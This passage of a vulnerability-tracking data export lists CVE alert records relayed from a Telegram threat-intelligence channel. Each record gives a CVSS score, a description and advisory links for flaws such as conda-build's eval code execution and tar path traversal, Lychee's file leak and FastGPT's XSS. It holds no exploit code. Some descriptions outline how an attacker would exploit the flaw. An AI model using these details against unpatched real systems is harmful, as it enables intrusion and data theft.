vulnerability was found in libXpm due to a boundary condition within the XpmCreateXpmImageFromBuffer() function. This flaw allows a local attacker to trigger an out-of-bounds read error and read the contents of memory on the system.\n\ud83d\udccf Published: 2023-10-10T12:26:08.737Z\n\ud83d\udccf Modified: 2025-06-16T17:04:22.032Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:2146\n2. https://access.redhat.com/errata/RHSA-2024:2217\n3. https://access.redhat.com/errata/RHSA-2024:2974\n4. https://access.redhat.com/errata/RHSA-2024:3022\n5. https://access.redhat.com/security/cve/CVE-2023-43788\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2242248", "creation_timestamp": "2025-06-16T17:37:54.000000Z"}, {"uuid": "a15ddf04-20f8-4480-9bdc-1d944b26ee38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-34GH-G567-HQ85", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19099", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52557\n\ud83d\udd25 CVSS Score: 8.6 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: Mail-0's Zero is an open-source email solution. In version 0.8 it's possible for an attacker to craft an email that executes javascript leading to session hijacking due to improper sanitization. This issue has been patched in version 0.81.\n\ud83d\udccf Published: 2025-06-21T01:42:23.004Z\n\ud83d\udccf Modified: 2025-06-21T01:42:23.004Z\n\ud83d\udd17 References:\n1. https://github.com/Mail-0/Zero/security/advisories/GHSA-34gh-g567-hq85\n2. https://github.com/Mail-0/Zero/pull/1386\n3. https://github.com/Mail-0/Zero/commit/48d1df65b62c9c57897b72b241081f447140342f", "creation_timestamp": "2025-06-21T03:25:29.000000Z"}, {"uuid": "d4040b17-3425-4ffd-9bc3-55992b709cb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R976-RFRV-Q24M", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19098", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52552\n\ud83d\udd25 CVSS Score: 5.5 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: FastGPT is an AI Agent building platform. Prior to version 4.9.12, the LastRoute Parameter on login page is vulnerable to open redirect and DOM-based XSS. Improper validation and lack of sanitization of this parameter allows attackers execute malicious JavaScript or redirect them to attacker-controlled sites. This issue has been patched in version 4.9.12.\n\ud83d\udccf Published: 2025-06-21T02:15:07.026Z\n\ud83d\udccf Modified: 2025-06-21T02:15:07.026Z\n\ud83d\udd17 References:\n1. https://github.com/labring/FastGPT/security/advisories/GHSA-r976-rfrv-q24m\n2. https://github.com/labring/FastGPT/commit/095b75ee27746004106eddeaa4840688a61ff6eb", "creation_timestamp": "2025-06-21T03:25:28.000000Z"}, {"uuid": "c386c048-6c95-4942-a761-11b40fdd6c6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6CC8-C3C9-3RGR", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18524", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32798\n\ud83d\udd25 CVSS Score: 8.2 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: Conda-build contains commands and tools to build conda packages. Prior to version 25.4.0, the conda-build recipe processing logic has been found to be vulnerable to arbitrary code execution due to unsafe evaluation of recipe selectors. Currently, conda-build uses the eval function to process embedded selectors in meta.yaml files. This approach evaluates user-defined expressions without proper sanitization, which allows arbitrary code to be executed during the build process. As a result, the integrity of the build environment is compromised, and unauthorized commands or file operations may be performed. The vulnerability stems from the inherent risk of using eval() on untrusted input in a context intended to control dynamic build configurations. By directly interpreting selector expressions, conda-build creates a potential execution pathway for malicious code, violating security assumptions. This issue has been patched in version 25.4.0.\n\ud83d\udccf Published: 2025-06-16T20:10:06.902Z\n\ud83d\udccf Modified: 2025-06-16T20:10:06.902Z\n\ud83d\udd17 References:\n1. https://github.com/conda/conda-build/security/advisories/GHSA-6cc8-c3c9-3rgr\n2. https://github.com/conda/conda-build/commit/3d87213b840774a24ab1733664d2b36664233754\n3. https://github.com/conda/conda-build/blob/834448b995eee02cf1c2e7ca97bcfa9affc77ee5/conda_build/metadata.py", "creation_timestamp": "2025-06-16T20:37:05.000000Z"}, {"uuid": "eeb01c45-dd68-4c16-8388-8979e09d53a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H499-PXGJ-QH5H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18523", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32799\n\ud83d\udd25 CVSS Score: 5.6 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: Conda-build contains commands and tools to build conda packages. Prior to version 25.4.0, the conda-build processing logic is vulnerable to path traversal (Tarslip) attacks due to improper sanitization of tar entry paths. Attackers can craft tar archives containing entries with directory traversal sequences to write files outside the intended extraction directory. This could lead to arbitrary file overwrites, privilege escalation, or code execution if sensitive locations are targeted. This issue has been patched in version 25.4.0.\n\ud83d\udccf Published: 2025-06-16T20:23:02.645Z\n\ud83d\udccf Modified: 2025-06-16T20:23:02.645Z\n\ud83d\udd17 References:\n1. https://github.com/conda/conda-build/security/advisories/GHSA-h499-pxgj-qh5h\n2. https://github.com/conda/conda-build/commit/bdf5e0022cec9a0c1378cca3f2dc8c92b4834673\n3. https://github.com/conda/conda-build/blob/834448b995eee02cf1c2e7ca97bcfa9affc77ee5/conda_build/convert.py\n4. https://github.com/conda/conda-build/blob/834448b995eee02cf1c2e7ca97bcfa9affc77ee5/conda_build/render.py", "creation_timestamp": "2025-06-16T20:37:04.000000Z"}, {"uuid": "8faa4d4a-e6e7-4916-a269-225c34e95f75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VFP6-3V8G-VCMM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18527", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32797\n\ud83d\udd25 CVSS Score: 6 (cvssV4_0, Vector: CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: Conda-build contains commands and tools to build conda packages. Prior to version 25.3.1, the write_build_scripts function in conda-build creates the temporary build script conda_build.sh with overly permissive file permissions (0o766), allowing write access to all users. Attackers with filesystem access can exploit a race condition to overwrite the script before execution, enabling arbitrary code execution under the victim's privileges. This risk is significant in shared environments, potentially leading to full system compromise. Even with non-static directory names, attackers can monitor parent directories for file creation events. The brief window between script creation (with insecure permissions) and execution allows rapid overwrites. Directory names can also be inferred via timestamps or logs, and automation enables exploitation even with semi-randomized paths by acting within milliseconds of detection. This issue has been patched in version 25.3.1. A workaround involves restricting conda_build.sh permissions from 0o766 to 0o700 (owner-only read/write/execute). Additionally, use atomic file creation (write to a temporary randomized filename and rename atomically) to minimize the race condition window.\n\ud83d\udccf Published: 2025-06-16T18:46:31.227Z\n\ud83d\udccf Modified: 2025-06-16T19:57:20.412Z\n\ud83d\udd17 References:\n1. https://github.com/conda/conda-build/security/advisories/GHSA-vfp6-3v8g-vcmm\n2. https://github.com/conda/conda-build/pull/5\n3. https://github.com/conda/conda-build/commit/d246e49c8f45e8033915156ee3d77769926f3c2e\n4. https://github.com/conda/conda-build/blob/3f06913bba22c4e1ef1065df9e00d86ac97f087c/conda_build/build.py#L3054-L3084", "creation_timestamp": "2025-06-16T20:37:10.000000Z"}, {"uuid": "c9980fdc-9e89-47a8-92c0-874645625477", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6698-MHXX-R84G", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18538", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-22192\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: Ursa is a cryptographic library for use with blockchains. The revocation scheme that is part of the Ursa CL-Signatures implementations has a flaw that could impact the privacy guarantees defined by the AnonCreds verifiable credential model. Notably, a malicious verifier may be able to generate a unique identifier for a holder providing a verifiable presentation that includes a Non-Revocation proof. The impact of the flaw is that a malicious verifier may be able to determine a unique identifier for a holder presenting a Non-Revocation proof. Ursa has moved to end-of-life status and no fix is expected.\n\ud83d\udccf Published: 2024-01-16T21:44:53.121Z\n\ud83d\udccf Modified: 2025-06-16T19:46:20.983Z\n\ud83d\udd17 References:\n1. https://github.com/hyperledger-archives/ursa/security/advisories/GHSA-6698-mhxx-r84g", "creation_timestamp": "2025-06-16T20:37:26.000000Z"}, {"uuid": "f85079b7-0cdb-47fe-bea8-026aa024c872", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-264P-99WQ-F4J6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18539", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-21634\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: Amazon Ion is a Java implementation of the Ion data notation. Prior to version 1.10.5, a potential denial-of-service issue exists in\u00a0`ion-java`\u00a0for applications that use\u00a0`ion-java`\u00a0to deserialize Ion text encoded data, or deserialize Ion text or binary encoded data into the\u00a0`IonValue`\u00a0model and then invoke certain\u00a0`IonValue`\u00a0methods on that in-memory representation. An actor could craft Ion data that, when loaded by the affected application and/or processed using the\u00a0`IonValue`\u00a0model, results in a\u00a0`StackOverflowError`\u00a0originating from the\u00a0`ion-java`\u00a0library. The patch is included in `ion-java` 1.10.5. As a workaround, do not load data which originated from an untrusted source or that could have been tampered with.\n\ud83d\udccf Published: 2024-01-03T22:46:03.585Z\n\ud83d\udccf Modified: 2025-06-16T19:45:37.088Z\n\ud83d\udd17 References:\n1. https://github.com/amazon-ion/ion-java/security/advisories/GHSA-264p-99wq-f4j6", "creation_timestamp": "2025-06-16T20:37:27.000000Z"}, {"uuid": "17b60e5a-256a-47e8-a622-0172bb76c66d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9WC7-MJ3F-74XV", "type": "published-proof-of-concept", "source": "Telegram/LhBAsLXZuywUMfmIXbSwPnWzjb6RJaoGfmWe6gs8QchtB8o", "content": "", "creation_timestamp": "2026-04-23T21:26:14.000000Z"}, {"uuid": "00bf6227-0cd5-4055-8eb8-22a0562f2147", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-57JG-M997-CX3Q", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18544", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47951\n\ud83d\udd25 CVSS Score: 4.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: Weblate is a web based localization tool. Prior to version 5.12, the verification of the second factor was not subject to rate limiting. The absence of rate limiting on the second factor endpoint allows an attacker with valid credentials to automate OTP guessing. This issue has been patched in version 5.12.\n\ud83d\udccf Published: 2025-06-16T20:57:52.509Z\n\ud83d\udccf Modified: 2025-06-16T20:57:52.509Z\n\ud83d\udd17 References:\n1. https://github.com/WeblateOrg/weblate/security/advisories/GHSA-57jg-m997-cx3q\n2. https://github.com/WeblateOrg/weblate/pull/14918\n3. https://github.com/WeblateOrg/weblate/commit/f806293451248c5d95e45b3b507e9d158bc4f384\n4. https://hackerone.com/reports/3150564\n5. https://github.com/WeblateOrg/weblate/releases/tag/weblate-5.12.1", "creation_timestamp": "2025-06-16T21:38:16.000000Z"}, {"uuid": "aa617b7c-9bd2-430b-a829-5932f7762fdb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6RJ9-GM78-VHF9", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18685", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-50202\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: Lychee is a free photo-management tool. In versions starting from 6.6.6 to before 6.6.10, an attacker can leak local files including environment variables, nginx logs, other user's uploaded images, and configuration secrets due to a path traversal exploit in SecurePathController.php. This issue has been patched in version 6.6.10.\n\ud83d\udccf Published: 2025-06-18T04:13:01.405Z\n\ud83d\udccf Modified: 2025-06-18T04:13:01.405Z\n\ud83d\udd17 References:\n1. https://github.com/LycheeOrg/Lychee/security/advisories/GHSA-6rj9-gm78-vhf9\n2. https://github.com/LycheeOrg/Lychee/commit/ae7270b7b47e4a284ea1f69d260e52d592711072\n3. https://github.com/LycheeOrg/Lychee/blob/0709f5d984d4df77fc5e23a29a0231437e684e99/app/Http/Controllers/SecurePathController.php#L61", "creation_timestamp": "2025-06-18T04:39:49.000000Z"}, {"uuid": "a8bc3f25-f7af-4caa-a66d-c904ec21f597", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HCQF-FW2R-52G4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18744", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-42450\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: Mastodon is a free, open-source social network server based on ActivityPub. Starting in version 4.2.0-beta1 and prior to version 4.2.0-rc2, by crafting specific input, attackers can inject arbitrary data into HTTP requests issued by Mastodon. This can be used to perform confused deputy attacks if the server configuration includes `ALLOWED_PRIVATE_ADDRESSES` to allow access to local exploitable services. Version 4.2.0-rc2 has a patch for the issue.\n\ud83d\udccf Published: 2023-09-19T15:53:39.685Z\n\ud83d\udccf Modified: 2025-06-18T14:28:57.529Z\n\ud83d\udd17 References:\n1. https://github.com/mastodon/mastodon/security/advisories/GHSA-hcqf-fw2r-52g4\n2. https://github.com/mastodon/mastodon/commit/94893cf24fc95b32cc7a756262acbe008c20a9d2", "creation_timestamp": "2025-06-18T14:41:44.000000Z"}, {"uuid": "1bbf1af5-f892-4858-ae91-5e1e2b1b2098", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GQ7V-JR8C-MFR7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18865", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52464\n\ud83d\udd25 CVSS Score: 9.5 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:L/SC:L/SI:L/SA:H)\n\ud83d\udd39 Description: Meshtastic is an open source mesh networking solution. In versions from 2.5.0 to before 2.6.11, the flashing procedure of several hardware vendors was resulting in duplicated public/private keys. Additionally, the Meshtastic was failing to properly initialize the internal randomness pool on some platforms, leading to possible low-entropy key generation. When users with an affected key pair sent Direct Messages, those message could be captured and decrypted by an attacker that has compiled the list of compromised keys. This issue has been patched in version 2.6.11 where key generation is delayed til the first time the LoRa region is set, along with warning users when a compromised key is detected. Version 2.6.12 furthers this patch by automatically wiping known compromised keys when found. A workaround to this vulnerability involves users doing a complete device wipe to remove vendor-cloned keys.\n\ud83d\udccf Published: 2025-06-19T15:10:18.365Z\n\ud83d\udccf Modified: 2025-06-19T15:10:18.365Z\n\ud83d\udd17 References:\n1. https://github.com/meshtastic/firmware/security/advisories/GHSA-gq7v-jr8c-mfr7\n2. https://github.com/meshtastic/firmware/commit/4bf2dd04aeeccc4ba20c79bcaad7a572aabdecad\n3. https://github.com/meshtastic/firmware/commit/55b2bbf93756fc7bbbfdbc7cbf29f88e6b637f22\n4. https://github.com/meshtastic/firmware/commit/e5f6804421ac4b76dd31980250a505dba24c2aa6\n5. https://github.com/meshtastic/firmware/commit/e623c70bd0c2ab9db9baf04888e19d1428310bb9", "creation_timestamp": "2025-06-19T15:41:38.000000Z"}, {"uuid": "5626846e-be36-4768-8fc8-65ba62e7fdd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QR9F-MPGF-WP25", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18863", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48886\n\ud83d\udd25 CVSS Score: 4.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: Hydra is a layer-two scalability solution for Cardano. Prior to version 0.22.0, the process assumes L1 event finality and does not consider failed transactions. Currently, Cardano L1 is monitored for certain events which are necessary for state progression. At the moment, Hydra considers those events as finalized as soon as they are recognized by the node participants making such transactions the target of re-org attacks. The system does not currently consider the fact that failed transactions on the Cardano L1 can indeed appear in blocks because these transactions are so infrequent. This issue has been patched in version 0.22.0.\n\ud83d\udccf Published: 2025-06-19T14:24:58.304Z\n\ud83d\udccf Modified: 2025-06-19T14:24:58.304Z\n\ud83d\udd17 References:\n1. https://github.com/cardano-scaling/hydra/security/advisories/GHSA-qr9f-mpgf-wp25\n2. https://github.com/cardano-scaling/hydra/commit/2bc6a82ef6dbfa8b94e1c11d55253713065f605e\n3. https://github.com/cardano-scaling/hydra/commit/fb22d968964bf5d5b79227cc845d871147044ce7", "creation_timestamp": "2025-06-19T14:40:09.000000Z"}, {"uuid": "57090785-89d6-47f1-a355-813c956622b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VVFW-4M39-FJQF", "type": "seen", "source": "Telegram/WzFh75qC0rKhc-ksOtYvdTuNUy7-5M1wjcl5aTvCRw8jriM", "content": "", "creation_timestamp": "2026-04-21T23:30:49.000000Z"}, {"uuid": "4811b191-a66a-47bc-afe1-c59d3f2c19b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-423W-P2W9-R7VQ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18748", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-42811\n\ud83d\udd25 CVSS Score: 4.7 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:H/A:N)\n\ud83d\udd39 Description: aes-gcm is a pure Rust implementation of the AES-GCM. Starting in version 0.10.0 and prior to version 0.10.3, in the AES GCM implementation of decrypt_in_place_detached, the decrypted ciphertext (i.e. the correct plaintext) is exposed even if tag verification fails. If a program using the `aes-gcm` crate's `decrypt_in_place*` APIs accesses the buffer after decryption failure, it will contain a decryption of an unauthenticated input. Depending on the specific nature of the program this may enable Chosen Ciphertext Attacks (CCAs) which can cause a catastrophic breakage of the cipher including full plaintext recovery. Version 0.10.3 contains a fix for this issue.\n\ud83d\udccf Published: 2023-09-22T15:19:15.445Z\n\ud83d\udccf Modified: 2025-06-18T14:22:56.534Z\n\ud83d\udd17 References:\n1. https://github.com/RustCrypto/AEADs/security/advisories/GHSA-423w-p2w9-r7vq\n2. https://docs.rs/aes-gcm/latest/src/aes_gcm/lib.rs.html#309\n3. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RYQCICN6BVC6I75O3F6W4VK4J3MOYDJU/\n4. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U67ZSMNX5V3WTBYPUYF45PSFG4SF5SGF/\n5. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ROBB6TBDAGEQ2WIINR34F3DPSN3FND6K/", "creation_timestamp": "2025-06-18T14:41:48.000000Z"}, {"uuid": "3710acf3-57b3-46eb-b3ad-4e71b356b1cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6CC8-C3C9-3RGR", "type": "published-proof-of-concept", "source": "Telegram/Z-E45SeLQmulAiMNJbdsp5CiTj_OWjFSQdsTMSo28OTtfoQ", "content": "", "creation_timestamp": "2025-06-16T20:31:30.000000Z"}, {"uuid": "0675d948-3d23-485f-a8a9-a56ab2d95b65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2217", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18479", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-43788\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: A vulnerability was found in libXpm due to a boundary condition within the XpmCreateXpmImageFromBuffer() function. This flaw allows a local attacker to trigger an out-of-bounds read error and read the contents of memory on the system.\n\ud83d\udccf Published: 2023-10-10T12:26:08.737Z\n\ud83d\udccf Modified: 2025-06-16T17:04:22.032Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:2146\n2. https://access.redhat.com/errata/RHSA-2024:2217\n3. https://access.redhat.com/errata/RHSA-2024:2974\n4. https://access.redhat.com/errata/RHSA-2024:3022\n5. https://access.redhat.com/security/cve/CVE-2023-43788\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2242248", "creation_timestamp": "2025-06-16T17:37:54.000000Z"}, {"uuid": "eadf01e2-bfdf-48b4-8f90-010313937677", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J59P-4XRR-FP8G", "type": "published-proof-of-concept", "source": "Telegram/Sh-VDLwDsigv2TtmIHQb5bM9xL-0-hntwqefkM3TigDwq8o", "content": "", "creation_timestamp": "2026-04-21T21:26:08.000000Z"}, {"uuid": "fcbc13a7-993d-4afc-b095-9e77aa561cfa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J662-9WCJ-MF36", "type": "published-proof-of-concept", "source": "Telegram/Sh-VDLwDsigv2TtmIHQb5bM9xL-0-hntwqefkM3TigDwq8o", "content": "", "creation_timestamp": "2026-04-21T21:26:08.000000Z"}, {"uuid": "833fe844-725a-4a2f-b2d8-fe41ba720ba9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J6QP-J853-QRFF", "type": "seen", "source": "Telegram/zADwex3kLz9IaLHw__x_MwQfRAPY0yfg2SR1HrZ5uE72Qmc", "content": "", "creation_timestamp": "2026-04-21T21:26:25.000000Z"}, {"uuid": "6e754d89-8d4e-4257-bbb2-199905fc4a69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G3CP-PQ72-HJPV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18216", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49579\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: Citizen is a MediaWiki skin that makes extensions part of the cohesive experience. All system messages in menu headings using the Menu.mustache template are inserted as raw HTML, allowing anybody who can edit those messages to insert arbitrary HTML into the DOM. This impacts wikis where a group has the `editinterface` but not the `editsitejs` user right. This vulnerability is fixed in 3.3.1.\n\ud83d\udccf Published: 2025-06-12T18:50:44.360Z\n\ud83d\udccf Modified: 2025-06-12T19:16:43.720Z\n\ud83d\udd17 References:\n1. https://github.com/StarCitizenTools/mediawiki-skins-Citizen/security/advisories/GHSA-g3cp-pq72-hjpv\n2. https://github.com/StarCitizenTools/mediawiki-skins-Citizen/commit/54c8717d45ce1594918f11cb9ce5d0ccd8dfee65\n3. https://github.com/StarCitizenTools/mediawiki-skins-Citizen/commit/93c36ac778397e0e7c46cf7adb1e5d848265f1bd", "creation_timestamp": "2025-06-12T19:33:48.000000Z"}, {"uuid": "f8c428da-3aa0-48e3-8492-c898143d1761", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q2QH-V828-R4P7", "type": "seen", "source": "Telegram/zADwex3kLz9IaLHw__x_MwQfRAPY0yfg2SR1HrZ5uE72Qmc", "content": "", "creation_timestamp": "2026-04-21T21:26:25.000000Z"}, {"uuid": "c926b920-5b68-441f-a10b-4a01f41dcd12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q93Q-V844-JRQP", "type": "seen", "source": "Telegram/zADwex3kLz9IaLHw__x_MwQfRAPY0yfg2SR1HrZ5uE72Qmc", "content": "", "creation_timestamp": "2026-04-21T21:26:25.000000Z"}, {"uuid": "ab0e71c0-fd71-4c7e-8df3-0711272bb004", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X3C7-22C8-PRG7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18341", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49597\n\ud83d\udd25 CVSS Score: 3.9 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L)\n\ud83d\udd39 Description: handcraftedinthealps goodby-csv is a highly memory efficient, flexible and extendable open-source CSV import/export library. Prior to 1.4.3, goodby-csv could be used as part of a chain of methods that is exploitable when an insecure deserialization vulnerability exists in an application. This so-called \"gadget chain\" presents no direct threat but is a vector that can be used to achieve remote code execution if the application deserializes untrusted data due to another vulnerability. The problem is patched with Version 1.4.3.\n\ud83d\udccf Published: 2025-06-13T19:51:19.190Z\n\ud83d\udccf Modified: 2025-06-13T19:51:19.190Z\n\ud83d\udd17 References:\n1. https://github.com/handcraftedinthealps/goodby-csv/security/advisories/GHSA-x3c7-22c8-prg7\n2. https://github.com/handcraftedinthealps/goodby-csv/commit/acd14c6ed85116bb2cb4da35ab62821e5cf54519", "creation_timestamp": "2025-06-13T20:35:34.000000Z"}, {"uuid": "bf672ee7-e6ed-4ba6-b305-1fa15154db48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C32M-27PJ-4XCJ", "type": "published-proof-of-concept", "source": 